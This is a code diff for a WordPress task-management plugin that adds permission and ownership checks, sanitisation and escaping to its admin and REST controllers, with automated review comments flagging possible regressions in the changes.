--- a/lazytasks-project-task-management/admin/class-lazytask-admin.php
+++ b/lazytasks-project-task-management/admin/class-lazytask-admin.php
@@ -75,9 +75,19 @@
* between the defined hooks and the functions defined in this
* class.
*/
- // phpcs:ignore WordPress.Security.NonceVerification.Recommended
- if (isset($_REQUEST['page']) && str_contains($_REQUEST['page'], 'lazytasks-page')){
- wp_enqueue_style( 'lazytasks-style', plugin_dir_url( __FILE__ ) . 'frontend/build/index.css', array(), $this->version, 'all');
+ // phpcs:ignore WordPress.Security.NonceVerification.Recommended -- No form processing, only enqueue assets
+ if ( isset( $_REQUEST['page'] ) ) {
+ // phpcs:ignore WordPress.Security.NonceVerification.Recommended -- No form processing, only enqueue assets
+ $page = sanitize_key( wp_unslash( $_REQUEST['page'] ) );
+ if ( str_contains( $page, 'lazytasks-page' ) ) {
+ wp_enqueue_style(
+ 'lazytasks-style',
+ plugin_dir_url( __FILE__ ) . 'frontend/build/index.css',
+ array(),
+ $this->version,
+ 'all'
+ );
+ }
}
wp_enqueue_style( $this->plugin_name, plugin_dir_url( __FILE__ ) . 'css/pms-rbs-admin.css', array(), $this->version, 'all' );
@@ -102,41 +112,45 @@
* class.
*/
- // phpcs:ignore WordPress.Security.NonceVerification.Recommended
- if (isset($_REQUEST['page']) && str_contains($_REQUEST['page'], 'lazytasks-page')) {
- $userController = new LazytaskControllerLazytask_UserController();
- $userResponse = $userController->admin_after_auth_login();
-
- wp_enqueue_script('lazytasks-script', plugin_dir_url(__FILE__) . 'frontend/build/index.js', array('jquery', 'wp-element'), LAZYTASK_VERSION, true);
-
- $license_status = get_option('lazytask_license_activate');
- $premium_installed = get_option('lazytask_premium_installed');
- $lazytask_premium_activated_date = get_option('lazytask_premium_activated_date');
- //remaining days now to activation date
- if ($lazytask_premium_activated_date) {
- $activated_date = new DateTime($lazytask_premium_activated_date);
- $current_date = new DateTime();
- $interval = $current_date->diff($activated_date);
- $days_diff = $interval->days;
- if ($interval->invert == 0) {
- $days_diff = -$days_diff; // If the activation date is in the future, make days_diff negative
- }
- }
- $whiteboard_installed = get_option('lazytasks_whiteboard_installed');
-
- wp_localize_script('lazytasks-script', 'appLocalizer', [
- 'apiUrl' => home_url('/wp-json'),
- 'homeUrl' => home_url(''),
- 'nonce' => wp_create_nonce('wp_rest'),
- 'is_admin' => 1,
- 'userResponse' => $userResponse,
- 'i18n' => LazytaskServicesTransStrings::getStrings(),
- 'licenseStatus' => $license_status,
- 'premiumInstalled' => $premium_installed,
- 'whiteboardInstalled' => $whiteboard_installed,
- 'remainingDays' => $days_diff ?? 0,
- ]);
- }
+ // phpcs:ignore WordPress.Security.NonceVerification.Recommended -- No form processing, only enqueue assets
+ if ( isset( $_REQUEST['page'] ) ) {
+ // phpcs:ignore WordPress.Security.NonceVerification.Recommended -- No form processing, only enqueue assets
+ $page = sanitize_key( wp_unslash( $_REQUEST['page'] ) );
+ if ( str_contains( $page, 'lazytasks-page' ) ) {
+ $userController = new LazytaskControllerLazytask_UserController();
+ $userResponse = $userController->admin_after_auth_login();
+
+ wp_enqueue_script('lazytasks-script', plugin_dir_url(__FILE__) . 'frontend/build/index.js', array('jquery', 'wp-element'), LAZYTASK_VERSION, true);
+
+ $license_status = get_option('lazytask_license_activate');
+ $premium_installed = get_option('lazytask_premium_installed');
+ $lazytask_premium_activated_date = get_option('lazytask_premium_activated_date');
+ //remaining days now to activation date
+ if ($lazytask_premium_activated_date) {
+ $activated_date = new DateTime($lazytask_premium_activated_date);
+ $current_date = new DateTime();
+ $interval = $current_date->diff($activated_date);
+ $days_diff = $interval->days;
+ if ($interval->invert == 0) {
+ $days_diff = -$days_diff; // If the activation date is in the future, make days_diff negative
+ }
+ }
+ $whiteboard_installed = get_option('lazytasks_whiteboard_installed');
+
+ wp_localize_script('lazytasks-script', 'appLocalizer', [
+ 'apiUrl' => home_url('/wp-json'),
+ 'homeUrl' => home_url(''),
+ 'nonce' => wp_create_nonce('wp_rest'),
+ 'is_admin' => 1,
+ 'userResponse' => $userResponse,
+ 'i18n' => LazytaskServicesTransStrings::getStrings(),
+ 'licenseStatus' => $license_status,
+ 'premiumInstalled' => $premium_installed,
+ 'whiteboardInstalled' => $whiteboard_installed,
+ 'remainingDays' => $days_diff ?? 0,
+ ]);
+ }
+ }
}
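Review bot: `new DateTime($lazytask_premium_activated_date)` inside the `if ($lazytask_premium_activated_date)` branch throws an uncaught `Exception` when the stored option is not a parsable date string, which would fatal every admin screen whose `page` contains `lazytasks-page`; the value is read from the options table and nothing here validates it. Switching to the non-throwing form avoids that: `$activated_date = date_create( $lazytask_premium_activated_date );` followed by `if ( $activated_date ) {` around the diff computation, leaving `$days_diff` unset (so `?? 0` applies) otherwise. The `$interval->invert == 0` comparison could also be made strict (`=== 0`) since `invert` is always an int. The enclosing enqueue method starts before this hunk.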
@@ -281,6 +295,10 @@
//database migration
public function lazytask_database_migrate()
{
+ //manage_options capability check
+ if( !current_user_can('manage_options') ) {
+ return;
+ }
if( !defined('LAZYTASK_DB_VERSION') || get_option('lazytask_db_version')==='' || version_compare(get_option('lazytask_db_version'), LAZYTASK_DB_VERSION, '<') ) {
update_option('lazytask_db_version', LAZYTASK_DB_VERSION, 'no');
LazytaskHelperLazytask_DBMigrator::run();
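Review bot: The new `current_user_can('manage_options')` guard means the schema migration only runs on a request made by an administrator, so which hook `lazytask_database_migrate` is attached to (not visible here) now matters: if it is on `init`/`plugins_loaded`/`admin_init`, front-end, cron and REST requests (including the plugin's own JWT-authenticated API calls) will run against the old schema until an admin happens to load a page. If the intent is to restrict this to admin page loads, consider documenting that in the docblock, e.g. `// Runs only for users with manage_options; non-admin requests defer the migration until an admin visits.`; otherwise gate on context (`is_admin()` or a dedicated activation/upgrade path) rather than on the current user's capability. The pre-existing ordering of `update_option` before `run()` is unchanged by this commit.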
@@ -295,11 +313,11 @@
return;
}
- // Only block editing if this is the protected page
+ // phpcs:ignore WordPress.Security.NonceVerification.Recommended -- No form processing, only enqueue assets
if ( isset($_GET['post']) && (int) $_GET['post'] === $page_id ) {
wp_die(
- __('You are not allowed to edit this page.', 'lazytask'),
- __('Access denied', 'lazytask'),
+ esc_html__( 'You are not allowed to edit this page.', 'lazytasks-project-task-management' ),
+ esc_html__( 'Access denied', 'lazytasks-project-task-management' ),
array('response' => 403)
);
}
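Review bot: The new phpcs justification `-- No form processing, only enqueue assets` is copied from the enqueue hooks and is wrong for this block, which reads `$_GET['post']` to block editing of the protected page and ends in `wp_die`; a future reviewer will be misled about why the nonce check is waived. Replace it with a justification that matches the code, e.g. `// phpcs:ignore WordPress.Security.NonceVerification.Recommended -- read-only check of the post ID being edited; no state is changed`. The escaping change (`esc_html__`) and the text-domain change to `lazytasks-project-task-management` are fine, but note the latter assumes the plugin header declares the same text domain, which is not visible here. The enclosing function starts before this hunk.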
--- a/lazytasks-project-task-management/admin/frontend/build/index.asset.php
+++ b/lazytasks-project-task-management/admin/frontend/build/index.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'react-dom', 'wp-element'), 'version' => 'f0710113234d27eb1ebf');
+<?php return array('dependencies' => array('react', 'react-dom', 'wp-element'), 'version' => '2ca8d206c222a4107ad5');
--- a/lazytasks-project-task-management/includes/class-lazytask-activator.php
+++ b/lazytasks-project-task-management/includes/class-lazytask-activator.php
@@ -34,9 +34,9 @@
*/
public static function activate()
{
- // Free QR Code Generator
- Lazytask_Helper_QR_Code::lazytask_preview_app_qrcode_generator();
-
+ if(extension_loaded('gd') && extension_loaded('mbstring')){
+ Lazytask_Helper_QR_Code::lazytask_preview_app_qrcode_generator();
+ }
LazytaskHelperLazytask_DatabaseTableSchema::run();
if( !defined('LAZYTASK_DB_VERSION') || get_option('lazytask_db_version')==='' || version_compare(get_option('lazytask_db_version'), LAZYTASK_DB_VERSION, '<') ) {
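Review bot: The `extension_loaded('gd') && extension_loaded('mbstring')` guard is duplicated verbatim in `update_settings` in Lazytask_SettingController; putting it behind a single helper on the QR class (for example a static `lazytask_can_generate_qrcode()` returning that boolean) keeps the two call sites from drifting. At activation the QR generation is skipped silently, whereas the settings path reports the failure in its response message; consider recording the skip (a transient or option that the admin screen can surface as a notice) so site owners learn why the preview QR code is missing. The rest of `activate()` continues past this hunk.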
--- a/lazytasks-project-task-management/includes/class-lazytask-deactivator.php
+++ b/lazytasks-project-task-management/includes/class-lazytask-deactivator.php
@@ -31,34 +31,85 @@
* @since 1.0.0
*/
public static function deactivate() {
- if (defined('LAZYTASKS_PREMIUM_VERSION')) {
- activate_plugin( plugin_basename( __FILE__ ) ); // Deactivate our plugin
+ if ( ! is_admin() || ! current_user_can( 'activate_plugins' ) ) {
+ return;
+ }
+
+ $plugin = isset( $_REQUEST['plugin'] )
+ ? sanitize_text_field( wp_unslash( $_REQUEST['plugin'] ) )
+ : '';
+
+ // Verify nonce
+ $nonce = isset( $_REQUEST['_wpnonce'] )
+ ? sanitize_text_field( wp_unslash( $_REQUEST['_wpnonce'] ) )
+ : '';
+
+ if ( empty( $nonce ) || ! wp_verify_nonce( $nonce, 'deactivate-plugin_' . $plugin ) ) {
wp_die(
- 'You must deactivate the "Lazytasks Premium Mobile App" plugin before deactivating this plugin.<br><br><a href="' . admin_url('plugins.php') . '" class="button button-primary">Back to Plugins</a>',
- 'Plugin Deactivation Error',
- array('back_link' => true)
+ esc_html__( 'Invalid deactivation request.', 'lazytasks-project-task-management' ),
+ esc_html__( 'Plugin Deactivation Error', 'lazytasks-project-task-management' ),
+ array( 'back_link' => true )
);
}
- if (defined('LAZYTASKS_WHITEBOARD_VERSION')) {
- activate_plugin( plugin_basename( __FILE__ ) ); // Deactivate our plugin
+
+ // Back link safely escaped
+ $back_url = esc_url( admin_url( 'plugins.php' ) );
+ $back_text = esc_html__( 'Back to Plugins', 'lazytasks-project-task-management' );
+
+ $back_link = sprintf(
+ '<a href="%s" class="button button-primary">%s</a>',
+ $back_url,
+ $back_text
+ );
+
+ // Allowed tags for HTML output
+ $allowed = array(
+ 'a' => array(
+ 'href' => true,
+ 'class' => true,
+ 'title' => true,
+ ),
+ 'strong' => array(),
+ 'br' => array(),
+ );
+
+ // Premium block
+ if ( defined( 'LAZYTASKS_PREMIUM_VERSION' ) ) {
+ $raw_message = sprintf(
+ /* translators: %1$s: plugin name, %2$s: back link HTML */
+ __( 'You must deactivate the <strong>%1$s</strong> plugin before deactivating this plugin.<br><br>%2$s', 'lazytasks-project-task-management' ),
+ esc_html__( 'Lazytasks Premium Mobile App', 'lazytasks-project-task-management' ),
+ $back_link
+ );
+
wp_die(
- 'You must deactivate the "Lazytasks Whiteboard Addon" plugin before deactivating this plugin.<br><br><a href="' . admin_url('plugins.php') . '" class="button button-primary">Back to Plugins</a>',
- 'Plugin Deactivation Error',
- array('back_link' => true)
+ wp_kses( $raw_message, $allowed ), // Escaped output
+ esc_html__( 'Plugin Deactivation Error', 'lazytasks-project-task-management' ),
+ array( 'back_link' => true )
);
}
-
- // $login_page_id = get_option('lazytask_page_id');
- // if($login_page_id)
- // wp_delete_post($login_page_id, true);
+ // Whiteboard block
+ if ( defined( 'LAZYTASKS_WHITEBOARD_VERSION' ) ) {
+ $raw_message = sprintf(
+ /* translators: %1$s: plugin name, %2$s: back link HTML */
+ __( 'You must deactivate the <strong>%1$s</strong> plugin before deactivating this plugin.<br><br>%2$s', 'lazytasks-project-task-management' ),
+ esc_html__( 'Lazytasks Whiteboard Addon', 'lazytasks-project-task-management' ),
+ $back_link
+ );
- // delete_option('lazytask_page_id');
+ wp_die(
+ wp_kses( $raw_message, $allowed ), // Escaped output
+ esc_html__( 'Plugin Deactivation Error', 'lazytasks-project-task-management' ),
+ array( 'back_link' => true )
+ );
+ }
- delete_option('lazytask_do_activation_redirect');
- delete_option('lazytasks_config');
+ // Cleanup
+ delete_option( 'lazytask_do_activation_redirect' );
+ delete_option( 'lazytasks_config' );
+ }
- }
}
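Review bot: The new `wp_verify_nonce( $nonce, 'deactivate-plugin_' . $plugin )` check breaks legitimate deactivation paths: a bulk deactivation from plugins.php carries a `bulk-plugins` nonce and no `plugin` parameter, so this hook `wp_die`s with "Invalid deactivation request.", and WP-CLI or programmatic `deactivate_plugins()` calls fail the `! is_admin()` test and return early, skipping both the add-on dependency guard and the option cleanup. This callback is invoked by core's `deactivate_plugins()`, which is only reached from plugins.php after core has already verified `activate_plugins` and the appropriate nonce, so the re-check adds no protection. I would drop the block from `if ( ! is_admin() || ! current_user_can( 'activate_plugins' ) )` through the `'Invalid deactivation request.'` `wp_die`, and keep the dependency checks and cleanup unconditional. The wp_kses/esc_url handling of the back link is a good improvement.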
--- a/lazytasks-project-task-management/includes/class-lazytask-i18n.php
+++ b/lazytasks-project-task-management/includes/class-lazytask-i18n.php
@@ -35,11 +35,11 @@
*/
public function lazytask_load_plugin_textdomain() {
- load_plugin_textdomain(
+ /*load_plugin_textdomain(
'lazytasks-project-task-management',
false,
dirname( dirname( plugin_basename( __FILE__ ) ) ) . '/languages/'
- );
+ );*/
}
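Review bot: Commenting out `load_plugin_textdomain()` rather than deleting it leaves dead code in the method; if the call is no longer wanted, remove it and say why in the docblock, e.g. `// Translations are loaded just-in-time by core (WP 4.6+) for language packs from translate.wordpress.org.` Note that just-in-time loading only covers language packs installed under `wp-content/languages/plugins/`; any `.mo` files shipped in this plugin's own `/languages/` directory stop being loaded after this change, which is worth confirming against the release package. `lazytask_load_plugin_textdomain` is now an empty hook callback and could be unregistered at the call site, which is outside this hunk.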
--- a/lazytasks-project-task-management/lazytask.php
+++ b/lazytasks-project-task-management/lazytask.php
@@ -10,9 +10,9 @@
* Plugin Name: LazyTasks - Project & Task Management with Collaboration, Kanban and Gantt Chart
* Plugin URI: https://lazycoders.co/lazytasks
* Description: Comprehensive Task and Project Management: Create, assign, follow, and comment on tasks with ease. Our user-friendly interface ensures your projects are always on track and accessible.
- * Version: 1.2.37
+ * Version: 1.3.01
* Requires at least: 6.2
- * Tested up to: 6.8.3
+ * Tested up to: 6.9
* Requires PHP: 7.4
* Author: Lazycoders
* Author URI: https://lazycoders.co
@@ -34,15 +34,15 @@
* Start at version 1.0.0 and use SemVer - https://semver.org
* Rename this for your plugin and update it as you release new versions.
*/
-define( 'LAZYTASK_VERSION', '1.2.37' );
+define( 'LAZYTASK_VERSION', '1.3.01' );
-define( 'LAZYTASK_DB_VERSION', '1.1.88' );
+define( 'LAZYTASK_DB_VERSION', '1.1.89' );
define( 'LAZYTASK_TABLE_PREFIX', $wpdb->prefix .'pms_' );
const LAZYTASK_JWT_SECRET_KEY = SECURE_AUTH_KEY;
-define('LAZYTASK_APP_BUILDER_RESOURCE_URL', 'https://live.appza.net');
+ define('LAZYTASK_APP_BUILDER_RESOURCE_URL', 'https://live.appza.net');
/**
--- a/lazytasks-project-task-management/public/class-lazytask-public.php
+++ b/lazytasks-project-task-management/public/class-lazytask-public.php
@@ -81,8 +81,8 @@
wp_enqueue_style( 'lazytasks-style', plugin_dir_url( __DIR__ ) . 'admin/frontend/build/index.css', array(), $this->version, 'all');
}else{
// redirect to home page
- wp_redirect(home_url());
- exit;
+ wp_safe_redirect( home_url() );
+ exit;
}
}
@@ -141,7 +141,7 @@
]);
}else{
// redirect to home page
- wp_redirect(home_url());
+ wp_safe_redirect( home_url() );
exit;
}
}
--- a/lazytasks-project-task-management/src/Controller/Lazytask_CompanyController.php
+++ b/lazytasks-project-task-management/src/Controller/Lazytask_CompanyController.php
@@ -69,6 +69,13 @@
}
public function create(WP_REST_Request $request){
+
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request, ['create-workspace'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
+
global $wpdb;
$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
// $requestData = json_decode($request->get_body(), true);
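Review bot: The authorization check is performed inside the handler body rather than in the route's `permission_callback`, which means the route registration (not visible here) is presumably `__return_true` and every handler must remember to call `permission_check` first; a single forgotten call silently leaves an endpoint open. Consider moving `[$userController, 'permission_check']`-style callbacks into `register_rest_route()` so `WP_REST_Server` rejects unauthorized requests before any handler code runs, and keep the in-handler calls only where the required permission depends on request data. The remainder of `create()` is outside this hunk.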
@@ -161,6 +168,13 @@
}
public function update(WP_REST_Request $request){
+
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request, ['create-workspace', 'edit-workspace', 'add-member-to-project-send-invite', 'remove-member-from-project'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
+
global $wpdb;
$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
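Review bot: The permission list for `update()` includes `'create-workspace'`, so any user allowed to create a workspace passes this check for editing an existing one; if that is intentional (creators manage their own workspaces) it deserves a comment such as `// create-workspace is accepted here because workspace creators may edit workspaces they own`, otherwise drop it and rely on `'edit-workspace'`. This check is role/permission-level only and does not establish that the caller belongs to the workspace identified in the request; whether the body below enforces that is outside this hunk. The same list also grants update access via member add/remove permissions, which is a broad surface for a single endpoint.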
@@ -331,6 +345,13 @@
}
public function show(WP_REST_Request $request){
+
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
+
global $wpdb;
// Sanitize and validate the input data
@@ -349,6 +370,13 @@
}
public function delete(WP_REST_Request $request){
+
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request, ['delete-workspace'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
+
global $wpdb;
$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
--- a/lazytasks-project-task-management/src/Controller/Lazytask_MyZenTaskController.php
+++ b/lazytasks-project-task-management/src/Controller/Lazytask_MyZenTaskController.php
@@ -11,6 +11,13 @@
const TABLE_MY_ZEN_TASKS = LAZYTASK_TABLE_PREFIX . 'my_zen_tasks';
public function getAllMyZenTasks(WP_REST_Request $request) {
+
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request, ['view-only-access'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
+
global $wpdb;
$token = $request->get_header('Authorization');
$token = str_replace('Bearer ', '', $token);
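Review bot: `getAllMyZenTasks` accepts only `['view-only-access']`, whereas the sibling listing `getAllProjects` in Lazytask_ProjectController accepts `['view-only-access', 'create-project', 'create-workspace']`; if `permission_check` requires at least one of the listed permissions, a user who holds edit/create permissions but not the view-only flag is locked out of their own zen task list. I cannot see `permission_check`'s semantics, so please confirm, and either widen the list or document the intent, e.g. `// view-only-access is the baseline permission every member holds`. The `Authorization` header parsing that follows is unchanged and the method continues outside this hunk.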
@@ -52,7 +59,13 @@
}
- public function create( WP_REST_Request $request ) {
+ public function create( WP_REST_Request $request )
+ {
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
global $wpdb;
@@ -128,7 +141,14 @@
}
- public function update( WP_REST_Request $request ) {
+ public function update( WP_REST_Request $request )
+ {
+ //permission check
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
global $wpdb;
--- a/lazytasks-project-task-management/src/Controller/Lazytask_NotificationController.php
+++ b/lazytasks-project-task-management/src/Controller/Lazytask_NotificationController.php
@@ -22,7 +22,7 @@
}
private function init() {
- add_filter('lazycoder_integrated_action_list', [$this, 'extendedNotificationAction']);
+ add_filter('lazytask_integrated_action_list', [$this, 'extendedNotificationAction']);
}
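Review bot: Renaming the filter from `lazycoder_integrated_action_list` to `lazytask_integrated_action_list` silently detaches any add-on or site code still hooking the old name, so their notification actions stop being registered with no error. Where the filter is applied (not visible here), consider `apply_filters_deprecated( 'lazycoder_integrated_action_list', array( $list ), '1.3.01', 'lazytask_integrated_action_list' )` before applying the new name, or register this callback on both names for one release, and mention the rename in the changelog.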
public function extendedNotificationAction($preDefineActionList) {
$actionList = $this->actionList;
@@ -30,7 +30,14 @@
}
- public function getNotificationActionList() {
+ public function getNotificationActionList( WP_REST_Request $request )
+ {
+
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request, ['manage-notifications'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
$actionList = Integrations::registeredActionLists();
@@ -38,10 +45,14 @@
}
- public function getNotificationChannels() {
- global $wpdb;
- $db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
- $notificationChannelTable = LAZYTASK_TABLE_PREFIX . 'notification_channels';
+ public function getNotificationChannels( WP_REST_Request $request )
+ {
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request, ['manage-notifications'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
+
$notificationChannels = self::getChannels();
try {
if($notificationChannels) {
@@ -62,7 +73,13 @@
return $notificationChannels;
}
- public function getNotificationTemplates() {
+ public function getNotificationTemplates( WP_REST_Request $request )
+ {
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request, ['manage-notifications'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
global $wpdb;
$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
$notificationTemplateTable = LAZYTASK_TABLE_PREFIX . 'notification_templates';
@@ -83,7 +100,14 @@
}
// create notification template
- public function createNotificationTemplate(WP_REST_Request $request) {
+ public function createNotificationTemplate(WP_REST_Request $request)
+ {
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request, ['manage-notifications'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
+
global $wpdb;
$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
$notificationTemplateTable = LAZYTASK_TABLE_PREFIX . 'notification_templates';
@@ -115,7 +139,13 @@
}
//show notification template by id
- public function showNotificationTemplate(WP_REST_Request $request) {
+ public function showNotificationTemplate(WP_REST_Request $request)
+ {
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request, ['manage-notifications'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
global $wpdb;
$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
$notificationTemplateTable = LAZYTASK_TABLE_PREFIX . 'notification_templates';
@@ -149,7 +179,13 @@
}
//editNotificationTemplate
- public function editNotificationTemplate(WP_REST_Request $request) {
+ public function editNotificationTemplate(WP_REST_Request $request)
+ {
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request, ['manage-notifications'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
global $wpdb;
$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
$notificationTemplateTable = LAZYTASK_TABLE_PREFIX . 'notification_templates';
@@ -182,7 +218,13 @@
}
//delete notification template by id
- public function deleteNotificationTemplate(WP_REST_Request $request) {
+ public function deleteNotificationTemplate(WP_REST_Request $request)
+ {
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request, ['manage-notifications'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
global $wpdb;
$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
$notificationTemplateTable = LAZYTASK_TABLE_PREFIX . 'notification_templates';
@@ -343,7 +385,29 @@
$userId = $request->get_param('user_id');
$channels = $request->get_param('channels');
$notification_ids = $request->get_param('notification_ids');
-
+
+ $userController = new Lazytask_UserController();
+ $getCurrentUserResponse = $userController->lazytask_get_current_logged_user($request);
+ if (is_wp_error($getCurrentUserResponse)) {
+ return $getCurrentUserResponse;
+ }
+
+ $statusCode = $getCurrentUserResponse->get_status();
+ if($statusCode != 200){
+ return new WP_REST_Response(['status'=>$statusCode, 'message'=>'Unauthorized', 'data'=>[]], $statusCode);
+ }
+
+ $getCurrentUser = $getCurrentUserResponse->get_data();
+ $loggedInUserId = isset($getCurrentUser['data']['id']) ? $getCurrentUser['data']['id'] : null;
+
+ if ( $userId != $loggedInUserId) {
+ return new WP_REST_Response([
+ 'status' => 403,
+ 'message' => 'Forbidden: You can only modify your own notifications'
+ ], 403);
+ }
+
+
// Validate parameters
if (!$notification_ids || !$userId || !$channels) {
return new WP_REST_Response([
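Review bot: The ownership test `$userId != $loggedInUserId` is a loose comparison between a request parameter of unknown type and an id taken from a response array; make it explicit with `if ( (int) $userId !== (int) $loggedInUserId ) {` so that string/int mixes and unexpected values cannot compare equal. Because this check now runs before the `!$notification_ids || !$userId || !$channels` validation, a request with no `user_id` gets the 403 "only modify your own notifications" message instead of the intended validation error; moving the validation above the ownership check gives callers the right error. The check only asserts the `user_id` parameter matches the caller; whether `notification_ids` are constrained to that user is decided further down, outside this hunk.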
--- a/lazytasks-project-task-management/src/Controller/Lazytask_ProjectController.php
+++ b/lazytasks-project-task-management/src/Controller/Lazytask_ProjectController.php
@@ -13,6 +13,13 @@
const TABLE_PROJECTS = LAZYTASK_TABLE_PREFIX . 'projects';
public function getAllProjects(WP_REST_Request $request){
+
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request, ['view-only-access', 'create-project', 'create-workspace'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
+
global $wpdb;
$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
@@ -74,6 +81,11 @@
public function create(WP_REST_Request $request)
{
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request, ['create-project'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
global $wpdb;
$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
@@ -276,6 +288,12 @@
}
public function update(WP_REST_Request $request){
+
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request, ['edit-project', 'add-member-to-project-send-invite', 'remove-member-from-project'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
global $wpdb;
$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
$projectTableName = LAZYTASK_TABLE_PREFIX . 'projects';
@@ -456,7 +474,7 @@
$args = array_merge($taskIds, [(int)$requestData['deleted_member_id']]);
// Execute the query
- $wpdb->query($wpdb->prepare($sql, ...$args));
+ $db->query($db->prepare($sql, ...$args));
}
}
@@ -532,6 +550,12 @@
public function delete(WP_REST_Request $request){
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request, ['delete-project'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
+
// Sanitize and validate the input data
$id = $request->get_param('id');
$requestData = $request->get_json_params();
@@ -602,6 +626,11 @@
// Function for project archive
public function archiveProject(WP_REST_Request $request)
{
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request, ['project-archive-unarchive'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
global $wpdb;
$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
$projectsTable = LAZYTASK_TABLE_PREFIX . 'projects';
@@ -643,6 +672,11 @@
// Function for project unarchive
public function unarchiveProject(WP_REST_Request $request)
{
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request, ['project-archive-unarchive'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
global $wpdb;
$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
$projectsTable = LAZYTASK_TABLE_PREFIX . 'projects';
@@ -1296,6 +1330,32 @@
$requestData = $request->get_params();
$project = $this->getProjectById($projectId);
+ $userController = new Lazytask_UserController();
+ $getCurrentUserResponse = $userController->lazytask_get_current_logged_user($request);
+ if (is_wp_error($getCurrentUserResponse)) {
+ return $getCurrentUserResponse;
+ }
+
+ $statusCode = $getCurrentUserResponse->get_status();
+ if($statusCode != 200){
+ return new WP_REST_Response(['status'=>$statusCode, 'message'=>'Unauthorized', 'data'=>[]], $statusCode);
+ }
+
+ $getCurrentUser = $getCurrentUserResponse->get_data();
+ $loggedInUserId = isset($getCurrentUser['data']['id']) ? $getCurrentUser['data']['id'] : null;
+
+ $isAdministrator = in_array('administrator', $getCurrentUser['data']['roles']);
+ $isAddMemberToProject = in_array('add-member-to-project-send-invite', $getCurrentUser['data']['llc_permissions']);
+ $isManageWorkspaceAndProjects = in_array('manage-workspace-projects', $getCurrentUser['data']['llc_permissions']);
+
+ // Check if user is a member of the project
+ $isProjectMember = $project['members'] && sizeof($project['members']) > 0 && array_filter($project['members'], function($member) use ($loggedInUserId) {
+ return $member['id'] == $loggedInUserId;
+ });
+
+ if (!$isAdministrator && !$isAddMemberToProject && !$isManageWorkspaceAndProjects && !$isProjectMember) {
+ return new WP_REST_Response(['status' => 403, 'message' => 'Forbidden: You do not have access to this project', 'data' => []], 403);
+ }
$returnArray = [];
if ($project){
